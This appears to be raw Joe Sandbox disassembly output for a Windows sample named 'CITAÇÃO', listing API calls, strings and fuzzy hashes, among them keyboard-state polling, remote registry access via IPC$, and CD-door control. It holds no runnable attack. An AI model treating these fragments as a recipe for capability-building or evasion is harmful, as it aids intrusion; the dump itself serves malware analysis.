                                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                      • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      Similarity
                                                      • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      • API String ID: 1976180769-4113822522
                                                      APIs
                                                      Similarity
                                                      • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                      • String ID:
                                                      • API String ID: 461458858-0
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                      • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                      • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                      • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                      • DeleteObject.GDI32(?), ref: 004301D0
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                      Similarity
                                                      • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3969911579-0
                                                      APIs
                                                      Similarity
                                                      • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                      • String ID: 0
                                                      • API String ID: 956284711-4108050209
                                                      APIs
                                                      Similarity
                                                      • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 1965227024-3771769585
                                                      APIs
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                      Similarity
                                                      • API ID: SendString$_memmove_wcslen
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 369157077-1007645807
                                                      APIs
                                                      • GetParent.USER32 ref: 00445BF8
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                      • __wcsicoll.LIBCMT ref: 00445C33
                                                      • __wcsicoll.LIBCMT ref: 00445C4F
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                      Similarity
                                                      • API ID: __wcsicoll$ClassMessageNameParentSend
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 3125838495-3381328864
                                                      APIs
                                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                      • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                      • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                      • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                      Similarity
                                                      • API ID: MessageSend$CharNext
                                                      • String ID:
                                                      • API String ID: 1350042424-0
                                                      APIs
                                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                      • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                      • _wcscpy.LIBCMT ref: 004787E5
                                                      Similarity
                                                      • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                      • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 3052893215-2127371420
                                                      APIs
                                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                      • __swprintf.LIBCMT ref: 0045E7F7
                                                      • _wprintf.LIBCMT ref: 0045E8B3
                                                      • _wprintf.LIBCMT ref: 0045E8D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 2295938435-2354261254
                                                      Similarity
                                                      • API ID: __swprintf_wcscpy$__i64tow__itow
                                                      • String ID: %.15g$0x%p$False$True
                                                      • API String ID: 3038501623-2263619337
                                                      APIs
                                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                      • __swprintf.LIBCMT ref: 0045E5F6
                                                      • _wprintf.LIBCMT ref: 0045E6A3
                                                      • _wprintf.LIBCMT ref: 0045E6C7
                                                      Similarity
                                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 2295938435-8599901
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00443B67
                                                        • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                      • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                      • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                      • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                      • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                      • IsWindow.USER32(00000000), ref: 00443C3A
                                                      • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                      • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                      Similarity
                                                      • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1834419854-3405671355
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                      • LoadStringW.USER32(00000000), ref: 00454040
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • _wprintf.LIBCMT ref: 00454074
                                                      • __swprintf.LIBCMT ref: 004540A3
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 455036304-4153970271
                                                      APIs
                                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                      • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                      • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                      • _memmove.LIBCMT ref: 00467EB8
                                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                      • _memmove.LIBCMT ref: 00467F6C
                                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                      • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                      Similarity
                                                      • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                      • String ID:
                                                      • API String ID: 2170234536-0
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00453CE0
                                                      • SetKeyboardState.USER32(?), ref: 00453D3B
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                      • GetKeyState.USER32(000000A0), ref: 00453D75
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                      • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                      • GetKeyState.USER32(00000011), ref: 00453DEF
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                      • GetKeyState.USER32(00000012), ref: 00453E26
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                      • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                      • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                      • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                      • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                      • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                      • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                      • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                      • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                      • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                      • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                      • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                      • DeleteObject.GDI32(?), ref: 0047151E
                                                      • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                      • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                      • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                      • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                      • DeleteObject.GDI32(?), ref: 004715EA
                                                      • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                      Similarity
                                                      • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                      • String ID:
                                                      • API String ID: 3218148540-0
                                                      APIs
                                                      Similarity
                                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                      • String ID:
                                                      • API String ID: 136442275-0
                                                      • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                      • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                      • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                      • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                      APIs
                                                      • _wcsncpy.LIBCMT ref: 00467490
                                                      • _wcsncpy.LIBCMT ref: 004674BC
                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                      • _wcstok.LIBCMT ref: 004674FF
                                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                      • _wcstok.LIBCMT ref: 004675B2
                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                      • _wcslen.LIBCMT ref: 00467793
                                                      • _wcscpy.LIBCMT ref: 00467641
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • _wcslen.LIBCMT ref: 004677BD
                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                      • String ID: X
                                                      • API String ID: 3104067586-3081909835
                                                      • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                      • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                      • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                      • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                      • _wcslen.LIBCMT ref: 004610A3
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                      • GetWindowRect.USER32(?,?), ref: 00461248
                                                        • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                      Strings
                                                      Similarity
                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                      • String ID: ThumbnailClass
                                                      • API String ID: 4136854206-1241985126
                                                      • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                      • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                      • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                      • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                      APIs
                                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                      • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                      • GetClientRect.USER32(?,?), ref: 00471A1A
                                                      • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                                      Strings
                                                      Similarity
                                                      • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                      • String ID: 2
                                                      • API String ID: 1331449709-450215437
                                                      • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                      • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                      • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                      • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                      • __swprintf.LIBCMT ref: 00460915
                                                      • __swprintf.LIBCMT ref: 0046092D
                                                      • _wprintf.LIBCMT ref: 004609E1
                                                      Strings
                                                      Similarity
                                                      • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                      • API String ID: 3054410614-2561132961
                                                      • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                      • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                      • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                      • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                      APIs
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                      • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                      • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                      • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                      Strings
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 600699880-22481851
                                                      • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                      • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                      • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                      • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: DestroyWindow
                                                      • String ID: static
                                                      • API String ID: 3375834691-2160076837
                                                      • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                      • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                      • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                      • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                      • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                      • API String ID: 2907320926-3566645568
                                                      • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                      • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                      • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                      • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                      APIs
                                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                      • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                      • DeleteObject.GDI32(E2D55EB8), ref: 00470A04
                                                      • DestroyIcon.USER32(080082AC), ref: 00470A1C
                                                      • DeleteObject.GDI32(00A61C40), ref: 00470A34
                                                      • DestroyWindow.USER32(00A66988), ref: 00470A4C
                                                      • DestroyIcon.USER32(?), ref: 00470A73
                                                      • DestroyIcon.USER32(?), ref: 00470A81
                                                      • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                      Similarity
                                                      • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 1237572874-0
                                                      • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                      • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                      • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                      • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                      • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                      • VariantInit.OLEAUT32(?), ref: 004793E1
                                                      • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                      • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                      • VariantClear.OLEAUT32(?), ref: 00479489
                                                      • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                      • VariantClear.OLEAUT32(?), ref: 004794CA
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                      • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                      • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                      • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 0044480E
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                      • GetKeyState.USER32(000000A0), ref: 004448AA
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                      • GetKeyState.USER32(000000A1), ref: 004448D9
                                                      • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                      • GetKeyState.USER32(00000011), ref: 00444903
                                                      • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                      • GetKeyState.USER32(00000012), ref: 0044492D
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                      • GetKeyState.USER32(0000005B), ref: 00444958
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
